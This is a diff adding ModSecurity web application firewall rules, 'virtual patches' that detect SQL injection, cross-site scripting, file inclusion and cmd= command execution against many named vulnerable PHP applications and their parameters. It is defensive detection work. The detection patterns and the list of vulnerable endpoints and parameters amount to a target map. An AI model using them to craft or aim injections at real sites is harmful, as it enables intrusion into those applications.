+SecRule REQUEST_URI "/sendpassword\.php\?action=send" "chain,id:390023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPCollab v2.x / netOffice v2.x sendpassword.php SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_BODY "union select.*concat.*password.*admin\.php"
+
+
+# Rule 310019: Sourceworkshop newsletter "email" SQL Injection Vulnerability
+SecRule REQUEST_URI "/newsletter\.php" "chain,id:390024,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sourceworkshop newsletter SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:newsletteremail "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: X-Changer SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/index\.php" "chain,id:390025,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: X-Changer SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:from|ARGS:into|ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: Null news Multiple SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/(?:sub|unsub)\.php" "chain,id:390027,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Null news Multiple SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:user_username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: Null news Multiple SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/lostpass\.php" "chain,id:390028,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Null news Multiple SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:user_email "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: VSNS Lemon SQL injection Vulnerabilities
+SecRule REQUEST_URI "/functions/final_functions\.php" "chain,id:390029,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Null news Multiple SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: PHPLiveHelper 1.8 remote command execution Xploit
+SecRule REQUEST_URI "initiate\.php" "chain,id:390030,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPLiveHelper 1.8 remote command execution Xploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:abs_path "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
+
+
+# Rule 310019: Pixel Motion Blog SQL Injection Vulnerabilities
+SecRule REQUEST_URI "admin/index\.php" "chain,id:390031,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pixel Motion Blog SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:user|ARGS:pass "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: Pixel Motion Blog SQL Injection Vulnerabilities
+SecRule REQUEST_URI "index\.php" "chain,id:390032,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pixel Motion Blog SQL Injection Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:date "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
+
+
+# Rule 310019: Nuked-Klan "m" SQL Injection Vulnerability
+SecRule REQUEST_URI "index\.php" "chain,id:390033,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nuked-Klan SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:m "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: PHP ticket "frm_search_in" SQL Injection Vulnerability
+SecRule REQUEST_URI "search\.php" "chain,id:390036,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nuked-Klan SQL Injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:frm_search_in "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: G-Book "g_message" Script Insertion Vulnerability
+SecRule REQUEST_URI "/guestbook\.php" "chain,id:390038,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: G-Book g_message Script Insertion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:g_message "((javascript|script|about|applet|activex|chrome)*\>|html|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: PHPMyChat exploit
+#SecRule REQUEST_URI "messagesL\.php.?\?L=.*R=.*N=.*&T=.*cmd=" "id:391139,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPMyChat exploit'"
+
+
+# Rule 310019: Internet PhotoShow Remote File Inclusion Exploit
+#SecRule REQUEST_URI "index\.php?page=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/.*\?&[a-z]+=[a-z]" "id:390041,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Internet PhotoShow Remote File Inclusion Exploit'"
+
+
+# Rule 310019: phpinfo.cgi command execution
+SecRule REQUEST_URI "/phpinfo\.php\?cmd=" "id:390044,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpinfo.cgi command execution',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: openEngine "template" Parameter Local File Inclusion Vulnerability
+SecRule REQUEST_URI "website\.php" "chain,id:390046,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: openEngine template Parameter Local File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:template "\.\./\.\."
+
+
+# Rule 310019: ISPConfig "go_info[server][classes_root]" File Inclusion
+#SecRule REQUEST_URI "lib/session\.inc\.php" "chain,id:390047,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ISPConfig go_info[server][classes_root] File Inclusion'"
+#SecRule REQUEST_URI "go_info\[server\]\[classes_root\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: AliPAGER "ubild" Cross-Site Scripting and SQL Injection
+SecRule  REQUEST_URI "inc/elementz\.php" "chain,id:390049,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AliPAGER ubild Cross-Site Scripting and SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:ubild "((javascript|script|about|applet|activex|chrome)*\>|(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from))"
+
+
+# Rule 310019: MxBB Portal pafiledb Module "module_root_path" File Inclusion
+SecRule  REQUEST_URI "includes/pafiledb_constants\.php" "chain,id:390050,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MxBB Portal pafiledb Module module_root_path File Inclusion',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:module_root_path "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: Jadu CMS "register.php" Cross-Site Scripting Vulnerabilities
+SecRule  REQUEST_URI "site/scripts/register\.php" "chain,id:390051,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Jadu CMS register.php Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:forename|ARGS:surname|ARGS:reg_email|ARGS:email_conf|ARGS:company|ARGS:city|ARGS:postcode|ARGS:telephone "(javascript|script|about|applet|activex|chrome|php)*\>"
+
+
+# Rule 310019: OpenFAQ "q" Parameter Script Insertion Vulnerability
+SecRule  REQUEST_URI "search\.php" "chain,id:390052,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OpenFAQ q Parameter Script Insertion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:q "(javascript|script|about|applet|activex|chrome)*\>"
+
+
+# Rule 310019: Sugar Suite "sugarEntry" Parameter Security Bypass
+#SecRule  REQUEST_URI "/modules/.*/.*\.php\?globals\[sugarEntry\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "id:390054,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sugar Suite sugarEntry Parameter Security Bypass'"
+
+# Rule 310019: Sugar Suite "sugarEntry" Parameter Security Bypass
+#SecRule  REQUEST_URI "/modules/.*/.*\.php\?cmd=.*globals\[sugarEntry\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)" "id:390055,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sugar Suite sugarEntry Parameter Security Bypass'"
+
+# Rule 310019: Sugar Suite "sugarEntry" Parameter Security Bypass
+#SecRule  REQUEST_URI "/modules/.*/.*\.php" "chain,id:390056,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sugar Suite sugarEntry Parameter Security Bypass'"
+#SecRule  REQUEST_BODY|REQUEST_URI "\?globals\[sugarEntry\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: Sugar Suite exploit
+#SecRule  REQUEST_URI "modules/Administration/RebuildAudit\.php\?cmd=" #"id:390057,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Sugar Suite exploit'"
+
+
+# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+SecRule  REQUEST_URI "tiki-lastchanges\.php" "chain,id:390058,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:days|ARGS:offset "(javascript|script|about|applet|activex|chrome)+.?\>"
+
+# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+SecRule  REQUEST_URI "tiki-orphan_pages\.php" "chain,id:390059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:find "(javascript|script|about|applet|activex|chrome)+.?\>"
+
+# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+SecRule  REQUEST_URI "tiki-listpages\.php" "chain,id:390060,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:offset|ARGS:initial "(javascript|script|about|applet|activex|chrome)+.?\>"
+
+# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+SecRule  REQUEST_URI "tiki-remind_password\.php" "chain,id:390061,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:username "(javascript|script|about|applet|activex|chrome)+.?\>"
+
+# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+SecRule  REQUEST_URI "tiki-(admin_(rssmodules|notifications|content_templates|chat)|syslog)\.php" "chain,id:390062,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:offset "(javascript|script|about|applet|activex|chrome)+.?\>"
+
+# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+SecRule  REQUEST_URI "tiki-adminusers\.php" "chain,id:390063,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:numrows "(javascript|script|about|applet|activex|chrome)+.?\>"
+
+# Rule 310019: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+SecRule  REQUEST_URI "tiki-searchindex\.php" "chain,id:390095,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:highlist "(javascript|script|about|applet|activex|chrome)+.?\>"
+
+
+# Rule 310019: Wordpress shell injection Vulnerability
+SecRule  REQUEST_URI "/cache/user" "chain,id:390064,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress shell injection Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule  REQUEST_URI "\?cmd="
+
+
+# Rule 310019: Nucleus <= 3.22 arbitrary remote inclusion exploit
+#SecRule  REQUEST_URI "PLUGINADMIN\.php\?globals\[DIR_LIBS\]=((ht|f)tps?\:/|/tmp|/opt|/etc|/export|/var|/home|/usr|\.\.)" "id:390065,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nucleus arbitrary remote inclusion exploit'"
+
+
+# Rule 310019: CMS-Bandits "spaw_root" File Inclusion Vulnerabilities
+SecRule REQUEST_URI "dialogs/(img|td|table)\.php" "chain,id:390067,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CMS-Bandits spaw_root File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:spaw_root "(ht|f)tps?\:/"
+
+
+# Rule 310019: Admanager Pro exploit
+SecRule REQUEST_URI "common\.php" "chain,id:390069,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Admanager Pro exploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:ipath "((ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: Bible Portal Project destination File Inclusion Vulnerability'
+SecRule REQUEST_URI "Admin/rtf_parser\.php" "chain,id:390071,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Bible Portal Project destination File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:destination "((ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: Flipper Poll "root_path" File Inclusion Vulnerability
+SecRule REQUEST_URI "poll\.php" "chain,id:390072,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Flipper Poll root_path File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:root_path "((ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: PictureDis Products "lang" Parameter File Inclusion Vulnerability
+SecRule REQUEST_URI "(thumstbl|wpfiles|wallpapr)\.php" "chain,id:390073,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PictureDis Products lang Parameter File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:lang "((ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: Joomla and Mambo 'Weblinks' blind SQL injection / admin credentials EXPLOIT
+SecRule REQUEST_URI "index\.php" "chain,id:390074,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla/Mambo Weblinks blind SQL injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:title "(users[[:space:]]+WHERE[[:space:]]+usertype|union[[:space:]]+select[[:space:]]+IF|insert[[:space:]]+into.+values|select.+from|bulk[[:space:]]+insert|union.+select)" chain
+SecRule ARGS:task "save"
+
+
+# Rule 310019: phpBB Mail2Forum Module "m2f_root_path" File Inclusion
+SecRule ARGS:m2f_root_path "((ht|f)tps?\:/|\.\./)" "id:390076,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic m2f_root_path File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019:
+SecRule REQUEST_URI "downloads\.php" "chain,id:390077,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic PHP download incddir File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:incdir "((ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: SiteDepth CMS "SD_DIR" Parameter Handling Remote File Inclusion Vulnerability
+SecRule REQUEST_URI "constants\.php" "chain,id:390078,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SiteDepth CMS SD_DIR Parameter Handling Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:SD_DIR "((ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: PhpLinkExchange "page" Parameter Handling Remote File Inclusion Vulnerability
+SecRule REQUEST_URI "^/index\.php" "chain,id:390079,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PhpLinkExchange page Parameter Handling Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:page "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./)"
+
+
+# Rule 310019: authldap
+SecRule REQUEST_URI "authldap\.php" "chain,id:390081,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: authldap Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:includePath "(?:(ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: honeypot
+SecRule REQUEST_URI "global_header\.php" "chain,id:390082,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: globalheader domain variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:domain "(?:(?:ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: Generic default_path variable remote file include
+SecRule REQUEST_URI "\.php" "chain,id:390092,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP default_path variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:default_path "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: file_upload sbp remote file inclusion vuln
+SecRule REQUEST_URI "file_upload\.php" "chain,id:390090,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: file_upload sbp variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:sbp "(?:(?:ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: viewtopic sid remote file inclusion vuln
+SecRule REQUEST_URI "viewtopic\.php" "chain,id:390091,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: viewtopic sid variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:sid "(?:(?:ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: get_infochannel root_path remote file inclusion vuln
+SecRule REQUEST_URI "get_infochannel\.inc\.php" "chain,id:390093,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: get_infochannel root_path variable Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:root_path "(?:(?:ht|f)tps?\:/|\.\./)"
+
+
+# Rule 310019: Generic default_path variable remote file include
+#SecRule REQUEST_URI "\.php" "chain,id:390096,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP glConf variable Remote File Inclusion Vulnerability'"
+#SecRule REQUEST_URI "glConf\[path_library\].*((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: MyNewsGroups :) "myng_root" File Inclusion Vulnerability
+SecRule REQUEST_URI "layersmenu\.inc\.php" "chain,id:390097,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MyNewsGroups myng_root Remote File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:myng_root "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: pageheaderdefault sysSessionPath upload exploit
+SecRule REQUEST_URI  "pageheaderdefault\.inc\.php\?" "chain,id:390100,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pageheaderdefault sysSessionPath upload exploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI  "_sysSessionPath=(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: new pattern
+SecRule REQUEST_URI "\.php\?" "chain,id:390101,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: possible vulnscan6 exploit',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "(?:config_ext\[languages_dir\]|dir\[inc\])=((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: Socketwiz Bookmarks "root_dir" File Inclusion Vulnerability
+SecRule REQUEST_URI "smarty_config\.php" "chain,id:390102,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Socketwiz Bookmarks root_dir File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:root_dir "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: MyABraCaDaWeb "base" File Inclusion Vulnerabilities
+#SecRule REQUEST_URI "(index|pop)\.php" "chain,id:390103,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MyABraCaDaWeb base File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+#SecRule ARGS:base "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: Vivvo Article Management CMS SQL Injection and File Inclusion
+SecRule REQUEST_URI "pdf_version\.php" "chain,id:390104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vivvo Article Management CMS SQL Injection'"
+SecRule ARGS:id "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: RaidenHTTPD "SoftParserFileXml" File Inclusion Vulnerability
+SecRule REQUEST_URI "raidenhttpd-admin/slice/check\.php" "chain,id:390106,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RaidenHTTPD SoftParserFileXml File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:SoftParserFileXml "(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: mcGalleryPRO "path_to_folder" File Inclusion Vulnerability
+SecRule REQUEST_URI "random2\.php" "chain,id:390107,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mcGalleryPRO path_to_folder File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:path_to_folder "((?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
+
+
+# Rule 310019: Timesheet PHP "username" Parameter SQL Injection
+SecRule REQUEST_URI "username\.php" "chain,id:390108,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Timesheet PHP username Parameter SQL Injection',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:username "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019: photokorn "dir_path" File Inclusion Vulnerabilities
+SecRule REQUEST_URI "(includes/cart\.inc\.php|extras/ext_cat\.php)" "chain,id:390111,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: photokorn dir_path File Inclusion Vulnerabilities',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
+SecRule ARGS:dir_path "(?:(?:ht|f)tps?:/|\.\./\.\.)"
+
+
+# Rule 310019: Somery "skindir" File Inclusion Vulnerability
+SecRule REQUEST_URI "admin/system/include\.php" "chain,id:390112,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Somery skindir File Inclusion Vulnerability',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
